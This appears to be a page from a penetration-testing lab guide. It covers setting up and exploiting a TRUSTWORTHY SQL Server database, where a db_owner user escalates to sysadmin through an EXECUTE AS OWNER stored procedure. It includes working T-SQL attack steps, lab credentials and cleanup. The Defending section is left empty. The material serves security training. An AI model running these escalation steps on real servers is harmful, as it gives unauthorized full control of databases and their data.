DB-Owner

Configuring

Prerequisite

Configuring

Login to WEB01 as the Administrator user with password Welcome01!.
Open "Microsoft SQL Server Management Studio"

3. Login with the sa user using the password sa or Password1! (Depending if you changed it for another vulnerability)

4. Click “New Query” button and use the SQL query below to make Amsterdam\Richard database owner of the production database.

Use Production;
EXEC sp_addrolemember [db_owner], [AMSTERDAM\Richard];

5. Change the Owner of the database to the SA account. Right click on "Production", click "Properties" and open the "Files" tab. Click on the "..." and fill in "sa" and click on "OK"

6. Execute the following query to make sure Amsterdam\Richard is Database owner and the real Owner of the database is sa:

select rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

SELECT suser_sname(owner_sid) FROM sys.databases WHERE name = 'Production'

7. Set the database as trustworthy and check if it is:

ALTER DATABASE MyAppDb SET TRUSTWORTHY ON

SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

The 1 after Production shows us that the database is ThrustWorthy.

Attacking

How it works

If the database is set as trustworthy and we have db_owner privileges, we could elevate our privileges and execute queries as sa.

Tools

HeidiSql

Executing attack

Login to WS01 as Richard with the password Sample123.
Download and start heidiSQL.
Click on "New" on the left bottom and configure the following settings:

Network Type: Microsoft SQL Server (TCP/IP)
Library: SQLOLEDB
Hostname / IP: WEB01.amsterdam.bank.local
Select: "Use Windows Authentication"
Port: 1433

4. Click "OK" on the security Issue warning.

Prerequisites

5. Click on the "Query" tab and enter the following Query to check if we are db_owner:

select rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

Our current user AMSTERDAM\richard is db_owner.

6. Check who is the owner of the database.

SELECT suser_sname(owner_sid), * FROM sys.databases

sa is the owner of the production database.

6. Check if the database is set to trustworthy

SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

The Production database is trustworty.

Executing the attack

7. Create a stored procedure which will add AMSTERDAM\Richard as sysadmin.

USE Production;
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'AMSTERDAM\Richard','sysadmin'

8. Execute the stored procedure:

USE Production;
EXEC sp_elevate_me

9. Check if we are sysadmin:

SELECT is_srvrolemember('sysadmin')

The 1 means that we are sysadmin! Check the executing commands page under SQL Server Attacks to read how to execute cmd commands:

Executing Commands

Cleanup

Login to WEB01 as Administrator, start the "Microsoft SQL Server Management Studio" and login as Administrator.
Execute the following query:

EXEC sp_dropsrvrolemember 'AMSTERDAM\Richard','sysadmin';
DROP PROCEDURE sp_elevate_me;

Defending

Recommendations

Detection

References

Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy DatabasesNetSPI

PreviousImpersonation NextEnumerate Logins

Last updated 3 years ago